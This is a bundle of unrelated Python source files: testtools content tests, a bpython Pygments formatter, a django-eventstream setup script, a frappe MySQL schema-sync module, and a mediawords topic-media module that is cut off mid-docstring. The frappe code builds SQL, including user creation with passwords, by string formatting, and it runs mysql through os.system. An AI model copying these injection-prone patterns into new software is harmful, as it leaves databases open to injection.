# Copyright (c) 2008-2012 testtools developers. See LICENSE for details. import json import os import tempfile import unittest from testtools import TestCase from testtools.compat import ( _b, _u, BytesIO, StringIO, ) from testtools.content import ( attach_file, Content, content_from_file, content_from_stream, JSON, json_content, StackLinesContent, StacktraceContent, TracebackContent, text_content, ) from testtools.content_type import ( ContentType, UTF8_TEXT, ) from testtools.matchers import ( Equals, MatchesException, Raises, raises, ) from testtools.tests.helpers import an_exc_info raises_value_error = Raises(MatchesException(ValueError)) class TestContent(TestCase): def test___init___None_errors(self): self.assertThat(lambda: Content(None, None), raises_value_error) self.assertThat( lambda: Content(None, lambda: ["traceback"]), raises_value_error) self.assertThat( lambda: Content(ContentType("text", "traceback"), None), raises_value_error) def test___init___sets_ivars(self): content_type = ContentType("foo", "bar") content = Content(content_type, lambda: ["bytes"]) self.assertEqual(content_type, content.content_type) self.assertEqual(["bytes"], list(content.iter_bytes())) def test___eq__(self): content_type = ContentType("foo", "bar") one_chunk = lambda: [_b("bytes")] two_chunk = lambda: [_b("by"), _b("tes")] content1 = Content(content_type, one_chunk) content2 = Content(content_type, one_chunk) content3 = Content(content_type, two_chunk) content4 = Content(content_type, lambda: [_b("by"), _b("te")]) content5 = Content(ContentType("f", "b"), two_chunk) self.assertEqual(content1, content2) self.assertEqual(content1, content3) self.assertNotEqual(content1, content4) self.assertNotEqual(content1, content5) def test___repr__(self): content = Content(ContentType("application", "octet-stream"), lambda: [_b("\x00bin"), _b("ary\xff")]) self.assertIn("\\x00binary\\xff", repr(content)) def test_iter_text_not_text_errors(self): content_type = ContentType("foo", "bar") content = Content(content_type, lambda: ["bytes"]) self.assertThat(content.iter_text, raises_value_error) def test_iter_text_decodes(self): content_type = ContentType("text", "strange", {"charset": "utf8"}) content = Content( content_type, lambda: [_u("bytes\xea").encode("utf8")]) self.assertEqual([_u("bytes\xea")], list(content.iter_text())) def test_iter_text_default_charset_iso_8859_1(self): content_type = ContentType("text", "strange") text = _u("bytes\xea") iso_version = text.encode("ISO-8859-1") content = Content(content_type, lambda: [iso_version]) self.assertEqual([text], list(content.iter_text())) def test_as_text(self): content_type = ContentType("text", "strange", {"charset": "utf8"}) content = Content( content_type, lambda: [_u("bytes\xea").encode("utf8")]) self.assertEqual(_u("bytes\xea"), content.as_text()) def test_from_file(self): fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) os.write(fd, _b('some data')) os.close(fd) content = content_from_file(path, UTF8_TEXT, chunk_size=2) self.assertThat( list(content.iter_bytes()), Equals([_b('so'), _b('me'), _b(' d'), _b('at'), _b('a')])) def test_from_nonexistent_file(self): directory = tempfile.mkdtemp() nonexistent = os.path.join(directory, 'nonexistent-file') content = content_from_file(nonexistent) self.assertThat(content.iter_bytes, raises(IOError)) def test_from_file_default_type(self): content = content_from_file('/nonexistent/path') self.assertThat(content.content_type, Equals(UTF8_TEXT)) def test_from_file_eager_loading(self): fd, path = 
tempfile.mkstemp() os.write(fd, _b('some data')) os.close(fd) content = content_from_file(path, UTF8_TEXT, buffer_now=True) os.remove(path) self.assertThat( ''.join(content.iter_text()), Equals('some data')) def test_from_file_with_simple_seek(self): f = tempfile.NamedTemporaryFile() f.write(_b('some data')) f.flush() self.addCleanup(f.close) content = content_from_file( f.name, UTF8_TEXT, chunk_size=50, seek_offset=5) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_file_with_whence_seek(self): f = tempfile.NamedTemporaryFile() f.write(_b('some data')) f.flush() self.addCleanup(f.close) content = content_from_file( f.name, UTF8_TEXT, chunk_size=50, seek_offset=-4, seek_whence=2) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_stream(self): data = StringIO('some data') content = content_from_stream(data, UTF8_TEXT, chunk_size=2) self.assertThat( list(content.iter_bytes()), Equals(['so', 'me', ' d', 'at', 'a'])) def test_from_stream_default_type(self): data = StringIO('some data') content = content_from_stream(data) self.assertThat(content.content_type, Equals(UTF8_TEXT)) def test_from_stream_eager_loading(self): fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) self.addCleanup(os.close, fd) os.write(fd, _b('some data')) stream = open(path, 'rb') self.addCleanup(stream.close) content = content_from_stream(stream, UTF8_TEXT, buffer_now=True) os.write(fd, _b('more data')) self.assertThat( ''.join(content.iter_text()), Equals('some data')) def test_from_stream_with_simple_seek(self): data = BytesIO(_b('some data')) content = content_from_stream( data, UTF8_TEXT, chunk_size=50, seek_offset=5) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_stream_with_whence_seek(self): data = BytesIO(_b('some data')) content = content_from_stream( data, UTF8_TEXT, chunk_size=50, seek_offset=-4, seek_whence=2) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_text(self): data = _u("some data") expected = Content(UTF8_TEXT, lambda: [data.encode('utf8')]) self.assertEqual(expected, text_content(data)) def test_json_content(self): data = {'foo': 'bar'} expected = Content(JSON, lambda: [_b('{"foo": "bar"}')]) self.assertEqual(expected, json_content(data)) class TestStackLinesContent(TestCase): def _get_stack_line_and_expected_output(self): stack_lines = [ ('/path/to/file', 42, 'some_function', 'print("Hello World")'), ] expected = ' File "/path/to/file", line 42, in some_function\n' \ ' print("Hello World")\n' return stack_lines, expected def test_single_stack_line(self): stack_lines, expected = self._get_stack_line_and_expected_output() actual = StackLinesContent(stack_lines).as_text() self.assertEqual(expected, actual) def test_prefix_content(self): stack_lines, expected = self._get_stack_line_and_expected_output() prefix = self.getUniqueString() + '\n' content = StackLinesContent(stack_lines, prefix_content=prefix) actual = content.as_text() expected = prefix + expected self.assertEqual(expected, actual) def test_postfix_content(self): stack_lines, expected = self._get_stack_line_and_expected_output() postfix = '\n' + self.getUniqueString() content = StackLinesContent(stack_lines, postfix_content=postfix) actual = content.as_text() expected = expected + postfix self.assertEqual(expected, actual) def test___init___sets_content_type(self): stack_lines, expected = self._get_stack_line_and_expected_output() content = StackLinesContent(stack_lines) expected_content_type = 
ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(expected_content_type, content.content_type) class TestTracebackContent(TestCase): def test___init___None_errors(self): self.assertThat( lambda: TracebackContent(None, None), raises_value_error) def test___init___sets_ivars(self): content = TracebackContent(an_exc_info, self) content_type = ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(content_type, content.content_type) result = unittest.TestResult() expected = result._exc_info_to_string(an_exc_info, self) self.assertEqual(expected, ''.join(list(content.iter_text()))) class TestStacktraceContent(TestCase): def test___init___sets_ivars(self): content = StacktraceContent() content_type = ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(content_type, content.content_type) def test_prefix_is_used(self): prefix = self.getUniqueString() actual = StacktraceContent(prefix_content=prefix).as_text() self.assertTrue(actual.startswith(prefix)) def test_postfix_is_used(self): postfix = self.getUniqueString() actual = StacktraceContent(postfix_content=postfix).as_text() self.assertTrue(actual.endswith(postfix)) def test_top_frame_is_skipped_when_no_stack_is_specified(self): actual = StacktraceContent().as_text() self.assertTrue('testtools/content.py' not in actual) class TestAttachFile(TestCase): def make_file(self, data): # GZ 2011-04-21: This helper could be useful for methods above trying # to use mkstemp, but should handle write failures and # always close the fd. There must be a better way. fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) os.write(fd, _b(data)) os.close(fd) return path def test_simple(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') data = 'some data' path = self.make_file(data) my_content = text_content(data) attach_file(test, path, name='foo') self.assertEqual({'foo': my_content}, test.getDetails()) def test_optional_name(self): # If no name is provided, attach_file just uses the base name of the # file. class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') base_path = os.path.basename(path) attach_file(test, path) self.assertEqual([base_path], list(test.getDetails())) def test_lazy_read(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') attach_file(test, path, name='foo', buffer_now=False) content = test.getDetails()['foo'] content_file = open(path, 'w') content_file.write('new data') content_file.close() self.assertEqual(''.join(content.iter_text()), 'new data') def test_eager_read_by_default(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') attach_file(test, path, name='foo') content = test.getDetails()['foo'] content_file = open(path, 'w') content_file.write('new data') content_file.close() self.assertEqual(''.join(content.iter_text()), 'some data') def test_suite(): from unittest import TestLoader return TestLoader().loadTestsFromName(__name__)
# The MIT License # # Copyright (c) 2008 Bob Farrell # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # A simple formatter for bpython to work with Pygments. # Pygments really kicks ass, it made it really easy to # get the exact behaviour I wanted, thanks Pygments.:) from pygments.formatter import Formatter from pygments.token import Keyword, Name, Comment, String, Error, \ Number, Operator, Token, Whitespace, Literal, Punctuation """These format strings are pretty ugly. \x01 represents a colour marker, which can be proceded by one or two of the following letters: k, r, g, y, b, m, c, w, d Which represent: blacK, Red, Green, Yellow, Blue, Magenta, Cyan, White, Default e.g. \x01y for yellow, \x01gb for green on blue background \x02 represents the bold attribute \x03 represents the start of the actual text that is output (in this case it's a %s for substitution) \x04 represents the end of the string; this is necessary because the strings are all joined together at the end so the parser needs them as delimeters """ Parenthesis = Token.Punctuation.Parenthesis theme_map = { Keyword: 'keyword', Name: 'name', Comment: 'comment', String: 'string', Literal: 'string', Error: 'error', Number: 'number', Token.Literal.Number.Float: 'number', Operator: 'operator', Punctuation: 'punctuation', Token: 'token', Whitespace: 'background', Parenthesis: 'paren', Parenthesis.UnderCursor: 'operator'} class BPythonFormatter(Formatter): """This is the custom formatter for bpython. Its format() method receives the tokensource and outfile params passed to it from the Pygments highlight() method and slops them into the appropriate format string as defined above, then writes to the outfile object the final formatted string. See the Pygments source for more info; it's pretty straightforward.""" def __init__(self, color_scheme, **options): self.f_strings = {} for k, v in theme_map.iteritems(): self.f_strings[k] = '\x01%s' % (color_scheme[v],) if k is Parenthesis: # FIXME: Find a way to make this the inverse of the current # background colour self.f_strings[k] += 'I' Formatter.__init__(self, **options) def format(self, tokensource, outfile): o = '' for token, text in tokensource: if text == '\n': continue while token not in self.f_strings: token = token.parent o += "%s\x03%s\x04" % (self.f_strings[token], text) outfile.write(o.rstrip()) # vim: sw=4 ts=4 sts=4 ai et
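# ---------------------------------------------------------------------------
# Hedged usage sketch: feeding BPythonFormatter to Pygments. The single-letter
# colours below are placeholders; a real bpython theme supplies them from its
# config. Assumes the same Python 2 environment this module targets.
# ---------------------------------------------------------------------------
from pygments import highlight
from pygments.lexers import PythonLexer

example_scheme = dict((name, 'c') for name in (
    'keyword', 'name', 'comment', 'string', 'error', 'number',
    'operator', 'punctuation', 'token', 'background', 'paren'))

formatted = highlight('1 + 1', PythonLexer(), BPythonFormatter(example_scheme))
# 'formatted' now holds the \x01..\x04 delimited string described in the
# module docstring above.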
import os
from setuptools import setup

with open(os.path.join(os.path.dirname(__file__), 'README.md')) as f:
    readme = f.read()

install_requires = []
install_requires.extend([
    'PyJWT>=1.5,<3',
    'gripcontrol>=4.0,<5',
    'django_grip>=3.0,<4',
    'Werkzeug>=0.12,<1',
    'six>=1.10,<2'])

setup(
    name='django-eventstream',
    version='4.2.0',
    description='Server-Sent Events for Django',
    long_description=readme,
    long_description_content_type='text/markdown',
    author='Justin Karneges',
    author_email='[email protected]',
    url='https://github.com/fanout/django-eventstream',
    license='MIT',
    zip_safe=False,
    packages=[
        'django_eventstream',
        'django_eventstream.migrations',
        'django_eventstream.management',
        'django_eventstream.management.commands'],
    package_data={'django_eventstream': ['static/django_eventstream/*']},
    install_requires=install_requires,
    tests_require=['Django>=2.0'],
    test_suite='tests.runtests.runtests',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Topic :: Utilities',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 3',
        'Framework :: Django',
    ]
)
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals """ Syncs a database table to the `DocType` (metadata) .. note:: This module is only used internally """ import re import os import frappe from frappe import _ from frappe.utils import cstr, cint, flt # imports - third-party imports import pymysql from pymysql.constants import ER class InvalidColumnName(frappe.ValidationError): pass varchar_len = '140' standard_varchar_columns = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype') type_map = { 'Currency': ('decimal', '18,6') ,'Int': ('int', '11') ,'Float': ('decimal', '18,6') ,'Percent': ('decimal', '18,6') ,'Check': ('int', '1') ,'Small Text': ('text', '') ,'Long Text': ('longtext', '') ,'Code': ('longtext', '') ,'Text Editor': ('longtext', '') ,'Date': ('date', '') ,'Datetime': ('datetime', '6') ,'Time': ('time', '6') ,'Text': ('text', '') ,'Data': ('varchar', varchar_len) ,'Link': ('varchar', varchar_len) ,'Dynamic Link': ('varchar', varchar_len) ,'Password': ('varchar', varchar_len) ,'Select': ('varchar', varchar_len) ,'Read Only': ('varchar', varchar_len) ,'Attach': ('text', '') ,'Attach Image': ('text', '') ,'Signature': ('longtext', '') ,'Color': ('varchar', varchar_len) ,'Barcode': ('longtext', '') ,'Geolocation': ('longtext', '') } default_columns = ['name', 'creation', 'modified', 'modified_by', 'owner', 'docstatus', 'parent', 'parentfield', 'parenttype', 'idx'] optional_columns = ["_user_tags", "_comments", "_assign", "_liked_by"] default_shortcuts = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"] def updatedb(dt, meta=None): """ Syncs a `DocType` to the table * creates if required * updates columns * updates indices """ res = frappe.db.sql("select issingle from tabDocType where name=%s", (dt,)) if not res: raise Exception('Wrong doctype "%s" in updatedb' % dt) if not res[0][0]: tab = DbTable(dt, 'tab', meta) tab.validate() frappe.db.commit() tab.sync() frappe.db.begin() class DbTable: def __init__(self, doctype, prefix = 'tab', meta = None): self.doctype = doctype self.name = prefix + doctype self.columns = {} self.current_columns = {} self.meta = meta if not self.meta: self.meta = frappe.get_meta(self.doctype) # lists for change self.add_column = [] self.change_type = [] self.add_index = [] self.drop_index = [] self.set_default = [] # load self.get_columns_from_docfields() def validate(self): """Check if change in varchar length isn't truncating the columns""" if self.is_new(): return self.get_columns_from_db() columns = [frappe._dict({"fieldname": f, "fieldtype": "Data"}) for f in standard_varchar_columns] columns += self.columns.values() for col in columns: if len(col.fieldname) >= 64: frappe.throw(_("Fieldname is limited to 64 characters ({0})").format(frappe.bold(col.fieldname))) if col.fieldtype in type_map and type_map[col.fieldtype][0]=="varchar": # validate length range new_length = cint(col.length) or cint(varchar_len) if not (1 <= new_length <= 1000): frappe.throw(_("Length of {0} should be between 1 and 1000").format(col.fieldname)) try: # check for truncation max_length = frappe.db.sql("""select max(char_length(`{fieldname}`)) from `tab{doctype}`"""\ .format(fieldname=col.fieldname, doctype=self.doctype)) except pymysql.InternalError as e: if e.args[0] == ER.BAD_FIELD_ERROR: # Unknown column 'column_name' in 'field list' continue else: raise if max_length and max_length[0][0] and max_length[0][0] > new_length: current_type = 
self.current_columns[col.fieldname]["type"] current_length = re.findall('varchar\(([\d]+)\)', current_type) if not current_length: # case when the field is no longer a varchar continue current_length = current_length[0] if col.fieldname in self.columns: self.columns[col.fieldname].length = current_length frappe.msgprint(_("Reverting length to {0} for '{1}' in '{2}'; Setting the length as {3} will cause truncation of data.")\ .format(current_length, col.fieldname, self.doctype, new_length)) def sync(self): if self.is_new(): self.create() else: self.alter() def is_new(self): return self.name not in DbManager(frappe.db).get_tables_list(frappe.db.cur_db_name) def create(self): add_text = '' # columns column_defs = self.get_column_definitions() if column_defs: add_text += ',\n'.join(column_defs) + ',\n' # index index_defs = self.get_index_definitions() if index_defs: add_text += ',\n'.join(index_defs) + ',\n' # create table frappe.db.sql("""create table `%s` ( name varchar({varchar_len}) not null primary key, creation datetime(6), modified datetime(6), modified_by varchar({varchar_len}), owner varchar({varchar_len}), docstatus int(1) not null default '0', parent varchar({varchar_len}), parentfield varchar({varchar_len}), parenttype varchar({varchar_len}), idx int(8) not null default '0', %sindex parent(parent)) ENGINE={engine} ROW_FORMAT=COMPRESSED CHARACTER SET=utf8mb4 COLLATE=utf8mb4_unicode_ci""".format(varchar_len=varchar_len, engine=self.meta.get("engine") or 'InnoDB') % (self.name, add_text)) def get_column_definitions(self): column_list = [] + default_columns ret = [] for k in self.columns.keys(): if k not in column_list: d = self.columns[k].get_definition() if d: ret.append('`'+ k+ '` ' + d) column_list.append(k) return ret def get_index_definitions(self): ret = [] for key, col in self.columns.items(): if col.set_index and not col.unique and col.fieldtype in type_map and \ type_map.get(col.fieldtype)[0] not in ('text', 'longtext'): ret.append('index `' + key + '`(`' + key + '`)') return ret def get_columns_from_docfields(self): """ get columns from docfields and custom fields """ fl = frappe.db.sql("SELECT * FROM tabDocField WHERE parent = %s", self.doctype, as_dict = 1) lengths = {} precisions = {} uniques = {} # optional fields like _comments if not self.meta.istable: for fieldname in optional_columns: fl.append({ "fieldname": fieldname, "fieldtype": "Text" }) # add _seen column if track_seen if getattr(self.meta, 'track_seen', False): fl.append({ 'fieldname': '_seen', 'fieldtype': 'Text' }) if not frappe.flags.in_install_db and frappe.flags.in_install != "frappe": custom_fl = frappe.db.sql("""\ SELECT * FROM `tabCustom Field` WHERE dt = %s AND docstatus < 2""", (self.doctype,), as_dict=1) if custom_fl: fl += custom_fl # apply length, precision and unique from property setters for ps in frappe.get_all("Property Setter", fields=["field_name", "property", "value"], filters={ "doc_type": self.doctype, "doctype_or_field": "DocField", "property": ["in", ["precision", "length", "unique"]] }): if ps.property=="length": lengths[ps.field_name] = cint(ps.value) elif ps.property=="precision": precisions[ps.field_name] = cint(ps.value) elif ps.property=="unique": uniques[ps.field_name] = cint(ps.value) for f in fl: self.columns[f['fieldname']] = DbColumn(self, f['fieldname'], f['fieldtype'], lengths.get(f["fieldname"]) or f.get('length'), f.get('default'), f.get('search_index'), f.get('options'), uniques.get(f["fieldname"], f.get('unique')), precisions.get(f['fieldname']) or f.get('precision')) 
def get_columns_from_db(self): self.show_columns = frappe.db.sql("desc `%s`" % self.name) for c in self.show_columns: self.current_columns[c[0].lower()] = {'name': c[0], 'type':c[1], 'index':c[3]=="MUL", 'default':c[4], "unique":c[3]=="UNI"} # GET foreign keys def get_foreign_keys(self): fk_list = [] txt = frappe.db.sql("show create table `%s`" % self.name)[0][1] for line in txt.split('\n'): if line.strip().startswith('CONSTRAINT') and line.find('FOREIGN')!=-1: try: fk_list.append((line.split('`')[3], line.split('`')[1])) except IndexError: pass return fk_list # Drop foreign keys def drop_foreign_keys(self): if not self.drop_foreign_key: return fk_list = self.get_foreign_keys() # make dictionary of constraint names fk_dict = {} for f in fk_list: fk_dict[f[0]] = f[1] # drop for col in self.drop_foreign_key: frappe.db.sql("set foreign_key_checks=0") frappe.db.sql("alter table `%s` drop foreign key `%s`" % (self.name, fk_dict[col.fieldname])) frappe.db.sql("set foreign_key_checks=1") def alter(self): for col in self.columns.values(): col.build_for_alter_table(self.current_columns.get(col.fieldname.lower(), None)) query = [] for col in self.add_column: query.append("add column `{}` {}".format(col.fieldname, col.get_definition())) for col in self.change_type: current_def = self.current_columns.get(col.fieldname.lower(), None) query.append("change `{}` `{}` {}".format(current_def["name"], col.fieldname, col.get_definition())) for col in self.add_index: # if index key not exists if not frappe.db.sql("show index from `%s` where key_name = %s" % (self.name, '%s'), col.fieldname): query.append("add index `{}`(`{}`)".format(col.fieldname, col.fieldname)) for col in self.drop_index: if col.fieldname != 'name': # primary key # if index key exists if frappe.db.sql("""show index from `{0}` where key_name=%s and Non_unique=%s""".format(self.name), (col.fieldname, col.unique)): query.append("drop index `{}`".format(col.fieldname)) for col in self.set_default: if col.fieldname=="name": continue if col.fieldtype in ("Check", "Int"): col_default = cint(col.default) elif col.fieldtype in ("Currency", "Float", "Percent"): col_default = flt(col.default) elif not col.default: col_default = "null" else: col_default = '"{}"'.format(col.default.replace('"', '\\"')) query.append('alter column `{}` set default {}'.format(col.fieldname, col_default)) if query: try: frappe.db.sql("alter table `{}` {}".format(self.name, ", ".join(query))) except Exception as e: # sanitize if e.args[0]==1060: frappe.throw(str(e)) elif e.args[0]==1062: fieldname = str(e).split("'")[-2] frappe.throw(_("{0} field cannot be set as unique in {1}, as there are non-unique existing values".format(fieldname, self.name))) else: raise e class DbColumn: def __init__(self, table, fieldname, fieldtype, length, default, set_index, options, unique, precision): self.table = table self.fieldname = fieldname self.fieldtype = fieldtype self.length = length self.set_index = set_index self.default = default self.options = options self.unique = unique self.precision = precision def get_definition(self, with_default=1): column_def = get_definition(self.fieldtype, precision=self.precision, length=self.length) if not column_def: return column_def if self.fieldtype in ("Check", "Int"): default_value = cint(self.default) or 0 column_def += ' not null default {0}'.format(default_value) elif self.fieldtype in ("Currency", "Float", "Percent"): default_value = flt(self.default) or 0 column_def += ' not null default {0}'.format(default_value) elif self.default and 
(self.default not in default_shortcuts) \ and not self.default.startswith(":") and column_def not in ('text', 'longtext'): column_def += ' default "' + self.default.replace('"', '\"') + '"' if self.unique and (column_def not in ('text', 'longtext')): column_def += ' unique' return column_def def build_for_alter_table(self, current_def): column_def = get_definition(self.fieldtype, self.precision, self.length) # no columns if not column_def: return # to add? if not current_def: self.fieldname = validate_column_name(self.fieldname) self.table.add_column.append(self) return # type if (current_def['type'] != column_def) or\ self.fieldname != current_def['name'] or\ ((self.unique and not current_def['unique']) and column_def not in ('text', 'longtext')): self.table.change_type.append(self) else: # default if (self.default_changed(current_def) \ and (self.default not in default_shortcuts) \ and not cstr(self.default).startswith(":") \ and not (column_def in ['text','longtext'])): self.table.set_default.append(self) # index should be applied or dropped irrespective of type change if ( (current_def['index'] and not self.set_index and not self.unique) or (current_def['unique'] and not self.unique) ): # to drop unique you have to drop index self.table.drop_index.append(self) elif (not current_def['index'] and self.set_index) and not (column_def in ('text', 'longtext')): self.table.add_index.append(self) def default_changed(self, current_def): if "decimal" in current_def['type']: return self.default_changed_for_decimal(current_def) else: return current_def['default'] != self.default def default_changed_for_decimal(self, current_def): try: if current_def['default'] in ("", None) and self.default in ("", None): # both none, empty return False elif current_def['default'] in ("", None): try: # check if new default value is valid float(self.default) return True except ValueError: return False elif self.default in ("", None): # new default value is empty return True else: # NOTE float() raise ValueError when "" or None is passed return float(current_def['default'])!=float(self.default) except TypeError: return True class DbManager: """ Basically, a wrapper for oft-used mysql commands. like show tables,databases, variables etc... #TODO: 0. Simplify / create settings for the restore database source folder 0a. Merge restore database and extract_sql(from frappe_server_tools). 1. Setter and getter for different mysql variables. 2. Setter and getter for mysql variables at global level?? """ def __init__(self,db): """ Pass root_conn here for access to all databases. """ if db: self.db = db def get_current_host(self): return self.db.sql("select user()")[0][0].split('@')[1] def get_variables(self,regex): """ Get variables that match the passed pattern regex """ return list(self.db.sql("SHOW VARIABLES LIKE '%s'"%regex)) def get_table_schema(self,table): """ Just returns the output of Desc tables. """ return list(self.db.sql("DESC `%s`"%table)) def get_tables_list(self,target=None): """get list of tables""" if target: self.db.use(target) return [t[0] for t in self.db.sql("SHOW TABLES")] def create_user(self, user, password, host=None): #Create user if it doesn't exist. 
if not host: host = self.get_current_host() if password: self.db.sql("CREATE USER '%s'@'%s' IDENTIFIED BY '%s';" % (user[:16], host, password)) else: self.db.sql("CREATE USER '%s'@'%s';" % (user[:16], host)) def delete_user(self, target, host=None): if not host: host = self.get_current_host() try: self.db.sql("DROP USER '%s'@'%s';" % (target, host)) except Exception as e: if e.args[0]==1396: pass else: raise def create_database(self,target): if target in self.get_database_list(): self.drop_database(target) self.db.sql("CREATE DATABASE `%s` ;" % target) def drop_database(self,target): self.db.sql("DROP DATABASE IF EXISTS `%s`;"%target) def grant_all_privileges(self, target, user, host=None): if not host: host = self.get_current_host() self.db.sql("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@'%s';" % (target, user, host)) def grant_select_privilges(self, db, table, user, host=None): if not host: host = self.get_current_host() if table: self.db.sql("GRANT SELECT ON %s.%s to '%s'@'%s';" % (db, table, user, host)) else: self.db.sql("GRANT SELECT ON %s.* to '%s'@'%s';" % (db, user, host)) def flush_privileges(self): self.db.sql("FLUSH PRIVILEGES") def get_database_list(self): """get list of databases""" return [d[0] for d in self.db.sql("SHOW DATABASES")] def restore_database(self,target,source,user,password): from frappe.utils import make_esc esc = make_esc('$ ') os.system("mysql -u %s -p%s -h%s %s < %s" % \ (esc(user), esc(password), esc(frappe.db.host), esc(target), source)) def drop_table(self,table_name): """drop table if exists""" if not table_name in self.get_tables_list(): return self.db.sql("DROP TABLE IF EXISTS %s "%(table_name)) def validate_column_name(n): n = n.replace(' ','_').strip().lower() special_characters = re.findall("[\W]", n, re.UNICODE) if special_characters: special_characters = ", ".join('"{0}"'.format(c) for c in special_characters) frappe.throw(_("Fieldname {0} cannot have special characters like {1}").format(cstr(n), special_characters), InvalidColumnName) return n def validate_column_length(fieldname): """ In MySQL maximum column length is 64 characters, ref: https://dev.mysql.com/doc/refman/5.5/en/identifiers.html""" if len(fieldname) > 64: frappe.throw(_("Fieldname is limited to 64 characters ({0})").format(fieldname)) def remove_all_foreign_keys(): frappe.db.sql("set foreign_key_checks = 0") frappe.db.commit() for t in frappe.db.sql("select name from tabDocType where issingle=0"): dbtab = DbTable(t[0]) try: fklist = dbtab.get_foreign_keys() except Exception as e: if e.args[0]==1146: fklist = [] else: raise for f in fklist: frappe.db.sql("alter table `tab%s` drop foreign key `%s`" % (t[0], f[1])) def get_definition(fieldtype, precision=None, length=None): d = type_map.get(fieldtype) if not d: return coltype = d[0] size = None if d[1]: size = d[1] if size: if fieldtype in ["Float", "Currency", "Percent"] and cint(precision) > 6: size = '21,9' if coltype == "varchar" and length: size = length if size is not None: coltype = "{coltype}({size})".format(coltype=coltype, size=size) return coltype def add_column(doctype, column_name, fieldtype, precision=None): if column_name in frappe.db.get_table_columns(doctype): # already exists return frappe.db.commit() frappe.db.sql("alter table `tab%s` add column %s %s" % (doctype, column_name, get_definition(fieldtype, precision)))
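# ---------------------------------------------------------------------------
# Hedged illustration: a few column definitions implied by type_map and
# get_definition() above. Values are shown as comments (a sketch derived from
# this module, not a guarantee for any particular frappe release).
#
#   get_definition('Data')                  -> 'varchar(140)'
#   get_definition('Data', length=255)      -> 'varchar(255)'
#   get_definition('Int')                   -> 'int(11)'
#   get_definition('Currency')              -> 'decimal(18,6)'
#   get_definition('Currency', precision=9) -> 'decimal(21,9)'  # precision > 6 widens the column
#   get_definition('Small Text')            -> 'text'
# ---------------------------------------------------------------------------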
"""Creating and finding media within topics.""" import re import time import typing from mediawords.db import DatabaseHandler from mediawords.db.locks import get_session_lock from mediawords.util.log import create_logger from mediawords.util.url import normalize_url_lossy log = create_logger(__name__) # url and name length limits necessary to fit within postgres field MAX_URL_LENGTH = 1024 MAX_NAME_LENGTH = 124 # try appending this to urls to generate a unique url for get_unique_medium_url() URL_SPIDERED_SUFFIX = '#spider' # names for spidered tag and tag set SPIDERED_TAG_TAG = 'spidered' SPIDERED_TAG_SET = 'spidered' # retry query for new unique name to avoid race condition _GUESS_MEDIUM_RETRIES = 5 class McTopicMediaException(Exception): """Exception arising from this package.""" pass class McTopicMediaUniqueException(McTopicMediaException): """Exception raised when guess_medium is unable to find a unique name or url for a new media source.""" pass def _normalize_url(url: str) -> str: """Cap max length of url and run through normalize_url_lossy().""" nu = normalize_url_lossy(url) if nu is None: nu = url return nu[0:MAX_URL_LENGTH] def generate_medium_url_and_name_from_url(story_url: str) -> tuple: """Derive the url and a media source name from a story url. This function just returns the pathless normalized url as the medium_url and the host nane as the medium name. Arguments: url - story url Returns: tuple in the form (medium_url, medium_name) """ normalized_url = _normalize_url(story_url) matches = re.search(r'(http.?://([^/]+))', normalized_url, flags=re.I) if matches is None: log.warning("Unable to find host name in url: normalized_url (%s)" % story_url) return story_url, story_url (medium_url, medium_name) = (matches.group(1).lower(), matches.group(2).lower()) if not medium_url.endswith('/'): medium_url += "/" return medium_url, medium_name def _normalized_urls_out_of_date(db: DatabaseHandler) -> bool: """Return True iff there is at least one medium with a null normalized_url.""" null_medium = db.query("select * from media where normalized_url is null limit 1").hash() return null_medium is not None def _update_media_normalized_urls(db: DatabaseHandler) -> None: """Keep normalized_url field in media table up to date. Set the normalized_url field of any row in media for which it is null. Take care to lock the process so that only one process is doing this work at a time. 
